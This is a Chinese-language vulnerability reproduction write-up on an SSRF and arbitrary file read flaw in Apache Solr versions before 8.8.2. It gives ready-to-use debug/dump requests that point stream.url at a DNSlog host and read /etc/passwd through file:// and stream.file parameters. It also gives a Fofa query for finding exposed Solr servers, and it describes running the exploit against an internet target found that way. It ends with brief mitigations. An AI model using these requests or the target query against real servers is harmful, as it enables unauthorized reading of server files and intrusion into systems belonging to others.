影响范围
Apache Solr < 8.8.2
漏洞类型
SSRF漏洞
利用条件
- 影响范围应用
- 存在至少一个core
漏洞概述
2021年3月17日,有安全研究人员称在Apache Solr 8.8.2版本之前存在SSRF漏洞和任意文件读取漏洞,攻击者可以利用该漏洞进行SSRF攻击或者读取服务器端任意文件,危害较大,建议用户升级到最新的安全版本。
漏洞复现
在这里我们直接通过Fofa检索一个目标来进行漏洞复现:
Step 1:首先我们通过主界面的Core Admin选项卡来获取当前的Core名称:
Step 2:之后结合之前的Core name构造以下请求发起SSRF测试
代码语言:javascript复制http://x.x.x.x:8983/solr/records/debug/dump?stream.url=http://vlpasp.dnslog.cn¶m=ContentStream
之后可以在本地的DNSlog平台看到以下回显效果:
Step 3:之后构造以下请求来读取服务器端的/etc/passwd文件信息
代码语言:javascript复制http://x.x.x.x:8983/solr/records/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream
当然,也可以通过第二种方式读取:
代码语言:javascript复制http://x.x.x.x:8983/solr/records/debug/dump?stream.file=/etc/passwd¶m=ContentStream
目标检索
Fofa:
代码语言:javascript复制app="APACHE-Solr"
安全建议
1、开启身份验证/授权,参考官方文档:
https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html
2. 配置防火墙策略,确保Solr API(包括Admin UI)只有受信任的IP和用户才能访问
参考链接
https://issues.apache.org/jira/projects/SOLR/issues/SOLR-15124?filter=allopenissues